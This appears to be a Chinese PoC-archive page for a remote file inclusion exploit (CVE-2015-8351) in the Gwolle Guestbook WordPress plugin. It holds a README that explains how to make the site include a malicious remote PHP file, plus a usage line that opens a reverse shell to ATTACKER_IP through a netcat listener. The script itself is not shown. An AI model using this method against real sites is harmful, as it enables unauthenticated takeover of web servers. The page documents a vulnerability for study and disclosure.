POC详情: ed11b924a39d8598ded92179e942dc083c33d85f

来源
关联漏洞
标题: WordPress Gwolle Guestbook插件安全漏洞 (CVE-2015-8351)
描述:WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。Gwolle Guestbook是其中的一个留言板插件。 WordPress Gwolle Guestbook插件1.5.3及之前版本中存在远程文件包含漏洞,该漏洞源于程序没有充分过滤用户提交的输入。远程攻击者可通过向frontend/captcha/ajaxresponse.php文件发送带有URL的‘abspath’参数利用该漏洞执行任意的PHP代码。
描述
WordPress Plugin Gwolle Guestbook 1.5.3 - Remote File Inclusion
介绍
<h1>Gwolle Guestbook WordPress Plugin RFI Exploit</h1>

<p>This Python script exploits a critical Remote File Inclusion (RFI) vulnerability in the Gwolle Guestbook WordPress Plugin, which can be exploited by a non-authenticated attacker to include a remote PHP file and execute arbitrary code on the vulnerable system.</p>

<h2>Vulnerability Details</h2>

<p>HTTP GET parameter "abspath" is not being properly sanitized before being used in PHP require() function. A remote attacker can include a file named 'wp-load.php' from an arbitrary remote server and execute its content on the vulnerable web server. In order to do so, the attacker needs to place a malicious 'wp-load.php' file into their server document root and include the server's URL into the request.</p>

<p>Successful exploitation of this vulnerability can lead to the compromise of the entire WordPress installation, and may even lead to the entire web server's compromise.</p>

<h2>Usage</h2>

<p>The script requires three arguments:</p>

<ul>
  <li>Target URL: The URL of the vulnerable WordPress installation.</li>
  <li>Attacker host: The IP address or hostname of the attacker's machine.</li>
  <li>Attacker port: The port number where the attacker is listening for a reverse shell.</li>
</ul>

<p>Example:</p>

<pre><code>python3 exploit.py VICTIM_IP/WORDPRESS ATTACKER_IP ATTACKER_PORT</code></pre>

<p>Note: You need to have a netcat listener open on the attacker machine on the specified port.</p>

<h2>Disclaimer</h2>

<p>This script is provided for educational purposes only. The author is not responsible for any damages caused by the misuse of this script.</p>
文件快照

[4.0K] /data/pocs/ed11b924a39d8598ded92179e942dc083c33d85f ├── [ 808] exploit.py └── [1.6K] README.md 0 directories, 2 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。